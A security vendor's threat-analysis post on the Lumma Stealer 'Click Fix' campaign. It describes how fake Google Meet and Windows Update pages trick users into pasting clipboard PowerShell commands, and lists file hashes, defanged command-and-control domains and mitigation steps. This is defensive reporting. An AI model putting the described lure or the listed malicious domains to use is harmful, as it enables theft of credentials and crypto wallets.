top of page

Subscribe to our newsletter

Lumma Stealer Click Fix Attack: Threat Analysis and Mitigation for Windows Systems

  • Rescana
  • Mar 9
  • 3 min read
Image for post about Detailed Analysis Report on Lumma Stealer "Click Fix" Style Attack

Detailed Analysis Report on Lumma Stealer "Click Fix" Style Attack


Executive Summary

The Lumma Stealer is an advanced information-stealing malware exploiting a "Click Fix" style attack. This approach capitalizes on sophisticated social engineering techniques to deceive users into executing harmful PowerShell scripts under the guise of legitimate Google Meet and Windows Update interfaces. This malware is predominantly being marketed as a service (Malware-as-a-Service, MaaS) on Russian-speaking underground platforms. The Lumma Stealer has been implicated in a variety of campaigns globally, targeting sensitive data, including cryptocurrency wallets, browser information, email credentials, and financial data.

Impact Assessment

The Lumma Stealer "Click Fix" attack has significant implications for users and organizations. This malware is adept at bypassing traditional security measures through its use of legitimate-looking interfaces and sophisticated evasion tactics. The primary targets of this malware are Windows operating systems, particularly versions ranging from Windows 7 to 11. Additionally, the malware poses a risk to popular web browsers like Google Chrome, Microsoft Edge, and Mozilla Firefox, as well as cryptocurrency wallets and browser extensions like Metamask and Authenticator. Financial sector organizations and individuals involved in cryptocurrency transactions are particularly vulnerable.

Threat Actor Details

The Lumma Stealer is attributed to developers using aliases such as "Shamel" and "Lumma". The malware, written in C, utilizes the ChaCha20 cipher for encrypting its configurations, enhancing its stealth. The threat actors employ advanced delivery mechanisms and social engineering strategies to propagate the malware, indicating a high level of sophistication and resources.

Technical Details and IOCs

The attack utilizes fake verification interfaces that mimic services like Google Meet to trick users into executing PowerShell commands. This involves clipboard manipulation, where malicious scripts are placed into the clipboard for users to execute via the Windows Run prompt. Once executed, the PowerShell commands download additional scripts from malicious domains. Indicators of Compromise (IOCs) include a malicious PowerShell script with SHA256 hash

909ed8a1351f9a21ebdd5d8efb4147145f12d5d24225dbd44cd2800a1f94a596
and a malicious ZIP archive with SHA256 hash
0608775a345c5a0869418ffddd1f694cb888fe8acde6d34543516db1a01e3ef8
. Identified command and control (C2) domains include
web-security3[.]com
,
codxefusion[.]top
,
techspherxe[.]top
, and
farmingtzricks[.]top
.

Affected Systems and Services

Lumma Stealer targets Windows operating systems, specifically versions from Windows 7 to 11. It affects various web browsers including Google Chrome, Microsoft Edge, and Mozilla Firefox, in addition to cryptocurrency wallets like Binance and Ethereum. Browser extensions for crypto wallets and 2FA, such as Metamask and Authenticator, are also at risk.

Timeline of Events

The Lumma Stealer was first documented in August 2022. Since its discovery, it has been actively used in multiple campaigns across different regions. The use of fake interfaces to facilitate the attack has been a consistent tactic, demonstrating the malware's adaptability and the attackers' commitment to refining their methods.

Prioritized Mitigation Steps

Organizations should prioritize user awareness training to help individuals recognize phishing and social engineering attempts. Implementing tools to monitor PowerShell activities can help in detecting unusual behavior indicative of an attack. Network segmentation should be enforced to limit the spread of malware within an organization. Regular updates of systems and security software are crucial to protect against known vulnerabilities.

Detection Methods

Detection can be enhanced by monitoring for the specific IOCs associated with Lumma Stealer, such as the identified hashes of malicious scripts and ZIP archives. Security teams should also look for unusual PowerShell activity and network traffic directed towards the known C2 domains.

References and Advisories

For further details, refer to the following resources: GBHackers on Security's article on the Lumma Stealer attack (https://gbhackers.com/lumma-stealer-using-fake-google-meet-windows-update-sites/), Darktrace's blog on the rise of the Lumma Info-Stealer (https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer), and Trend Micro's analysis of Lumma Stealer’s GitHub-based delivery (https://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html).

About Rescana

Rescana assists organizations in managing third-party risks through its comprehensive Third Party Risk Management (TPRM) platform. By identifying vulnerabilities and potential threats in third-party partnerships, Rescana helps clients safeguard their operations against emerging cyber threats. For inquiries regarding this report or other cybersecurity concerns, please contact us at ops@rescana.com.

bottom of page